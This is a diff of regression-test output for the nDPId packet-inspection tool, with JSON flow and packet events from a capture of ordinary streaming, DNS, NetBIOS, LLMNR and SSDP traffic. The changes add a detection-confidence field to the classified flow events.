-00922{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104377754,"flow_last_seen":1470104377818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":414,"flow_tot_l4_payload_len":414,"flow_avg_l4_payload_len":69,"midstream":0,"ts_msec":1470104377818,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/videos\/10410.json?callback=jQuery18306855657112319022_1470103242123&_=1470104377698","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
+00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104377754,"flow_last_seen":1470104377818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":414,"flow_tot_l4_payload_len":414,"flow_avg_l4_payload_len":69,"midstream":0,"ts_msec":1470104377818,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/videos\/10410.json?callback=jQuery18306855657112319022_1470103242123&_=1470104377698","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1470104377820,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"ts_msec":1470104377820,"pkt":"AQBeAAD8ABxCjnAxCABFAAAyUccAAAERU0fAqHMI4AAA\/MkCFOsAHtPcYF4AAAABAAAAAAAABHdwYWQAAAEAAQ=="}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1470104377839,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"ts_msec":1470104377839,"pkt":"MzMAAQACcD6s8PAHht1gBWEEACwRAf6AAAAAAAAABAZVqGRTJd3\/AgAAAAAAAAAAAAAAAQACAiICIwAsiQQLJ3MdAAEADgABAAEduOb7cD6s8PAHAAYABAAXABgACAACAGQ="}
 00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1470104377839,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1470104377839,"pkt":"\/\/\/\/\/\/\/\/TF4M6gNlCABFAAFIAAAAABARcfzAqHcB\/\/\/\/\/wBDAEQBNAJhAgEGADFjB6UAAAAAwKgFCcCoBQnAqHcBAAAAAHDxofgq\/QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFNgTAqHcBMwQAAAA8AQT\/\/wAAAwTAqHcBBhCoXwEBCAgICKhfwAEICAQE\/wAAAAAAAAAAAAAAAAAA"}
 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377901,"flow_last_seen":1470104377901,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1470104377901,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":52723,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1470104377901,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1470104377901,"pkt":"TF4M6gNlABxCjnAxCABFAAA+UcgAAIARpSbAqHMICAgICM3zADUAKlE0ceUBAAABAAAAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAQ=="}
-00738{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377901,"flow_last_seen":1470104377901,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1470104377901,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377901,"flow_last_seen":1470104377901,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1470104377901,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1470104377901,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1470104377901,"pkt":"TF4M6gNlABxCjnAxCABFAAA+UcgAAIARpSbAqHMICAgICM3zADUAKlE0ceUBAAABAAAAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAQ=="}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378005,"flow_last_seen":1470104378005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1470104378005,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53622,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1470104378005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1470104378005,"pkt":"ABAj4ACgYMVHBbyMCABFAAAol0tAAEAGqdjAqAUQwKhzS9F2AbsV1ofmvikqE1ARIAA8\/AAAAAAAAAAA"}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1470104378007,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1470104378007,"pkt":"ABxCjnAxABAj4ACgCABFAAAoAABAAEAGQSTAqHNLwKgFEAG70Xa+KSoTFdaH51AQAEZctgAAAAAAAAAA"}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378021,"flow_last_seen":1470104378021,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1470104378021,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1470104378021,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1470104378021,"pkt":"\/\/\/\/\/\/\/\/ABxCjnAxCABFAABOUckAAIAR9HzAqHMIwKj\/\/wCJAIkAOha6seYBEAABAAAAAAAAIEZIRkFFQkVFQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378021,"flow_last_seen":1470104378021,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1470104378021,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378021,"flow_last_seen":1470104378021,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1470104378021,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1470104378021,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1470104378021,"pkt":"\/\/\/\/\/\/\/\/ABxCjnAxCABFAABOUckAAIAR9HzAqHMIwKj\/\/wCJAIkAOha6seYBEAABAAAAAAAAIEZIRkFFQkVFQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1470104378045,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1470104378045,"pkt":"MzMAAQADzD2CHu7jht1gAAAAACARAf6AAAAAAAAA7fUkCsjAgxL\/AgAAAAAAAAAAAAAAAQAD8KMU6wAgDOCgAAAAAAEAAAAAAAAGUk9fWDFDAAD\/AAE="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1470104378045,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104378045,"pkt":"AQBeAAD8zD2CHu7jCABFAAA0LRgAAAER5c3AqAUv4AAA\/PCjFOsAIMFmoAAAAAABAAAAAAAABlJPX1gxQwAA\/wAB"}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378045,"flow_last_seen":1470104378045,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1470104378045,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":58779,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1470104378045,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":92,"pkt_l4_len":38,"ts_msec":1470104378045,"pkt":"MzMAAQAD\/PiuMpcsht1gAAAAACYRAf6AAAAAAAAA6Y+64hn3aw\/\/AgAAAAAAAAAAAAAAAQAD5ZsU6wAmcsn2BAAAAAEAAAAAAAAM5bCP5L2b5bCI5qmfAAD\/AAE="}
-00615{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378045,"flow_last_seen":1470104378045,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1470104378045,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":58779,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378045,"flow_last_seen":1470104378045,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1470104378045,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":58779,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378045,"flow_last_seen":1470104378045,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1470104378045,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":58779,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1470104378045,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1470104378045,"pkt":"AQBeAAD8\/PiuMpcsCABFAAA6KxQAAAER6ZvAqANf4AAA\/OWbFOsAJvTF9gQAAAABAAAAAAAADOWwj+S9m+WwiOapnwAA\/wAB"}
-00604{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378045,"flow_last_seen":1470104378045,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1470104378045,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":58779,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378045,"flow_last_seen":1470104378045,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1470104378045,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":58779,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378045,"flow_last_seen":1470104378045,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104378045,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"239.255.255.250","src_port":59468,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1470104378045,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1470104378045,"pkt":"AQBef\/\/6\/PiuMpcsCABFAAChLEEAAAER2QnAqANf7\/\/\/+uhMB2wAjbUvTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
-00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378045,"flow_last_seen":1470104378045,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104378045,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"239.255.255.250","src_port":59468,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378045,"flow_last_seen":1470104378045,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104378045,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"239.255.255.250","src_port":59468,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1470104378454,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":92,"pkt_l4_len":38,"ts_msec":1470104378454,"pkt":"MzMAAQAD\/PiuMpcsht1gAAAAACYRAf6AAAAAAAAA6Y+64hn3aw\/\/AgAAAAAAAAAAAAAAAQAD5ZsU6wAmcsn2BAAAAAEAAAAAAAAM5bCP5L2b5bCI5qmfAAD\/AAE="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1470104378454,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1470104378454,"pkt":"AQBeAAD8\/PiuMpcsCABFAAA6KxYAAAER6ZnAqANf4AAA\/OWbFOsAJvTF9gQAAAABAAAAAAAADOWwj+S9m+WwiOapnwAA\/wAB"}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378557,"flow_last_seen":1470104378557,"flow_idle_time":180000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1470104378557,"l3_proto":"ip4","src_ip":"192.168.125.30","dst_ip":"255.255.255.255","src_port":62976,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -87,25 +87,25 @@
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1470104378770,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1470104378770,"pkt":"\/\/\/\/\/\/\/\/ABxCjnAxCABFAABOUcsAAIAR9HrAqHMIwKj\/\/wCJAIkAOha6seYBEAABAAAAAAAAIEZIRkFFQkVFQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378901,"flow_last_seen":1470104378901,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1470104378901,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"168.95.1.1","src_port":52723,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1470104378901,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1470104378901,"pkt":"TF4M6gNlABxCjnAxCABFAAA+UcwAAIARC9LAqHMIqF8BAc3zADUAKrfjceUBAAABAAAAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAQ=="}
-00734{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378901,"flow_last_seen":1470104378901,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1470104378901,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"168.95.1.1","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378901,"flow_last_seen":1470104378901,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1470104378901,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"168.95.1.1","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1470104378901,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1470104378901,"pkt":"TF4M6gNlABxCjnAxCABFAAA+UcwAAIARC9LAqHMIqF8BAc3zADUAKrfjceUBAAABAAAAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAQ=="}
 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1470104378905,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"ts_msec":1470104378905,"pkt":"ABxCjnAxTF4M6gNlCABFAABelWIAAPgRUBuoXwEBwKhzCAA1zfMASvjnceWBgAABAAIAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAcAMAAEAAQAAAjMABN5J\/qfADAABAAEAAAIzAATeSf5x"}
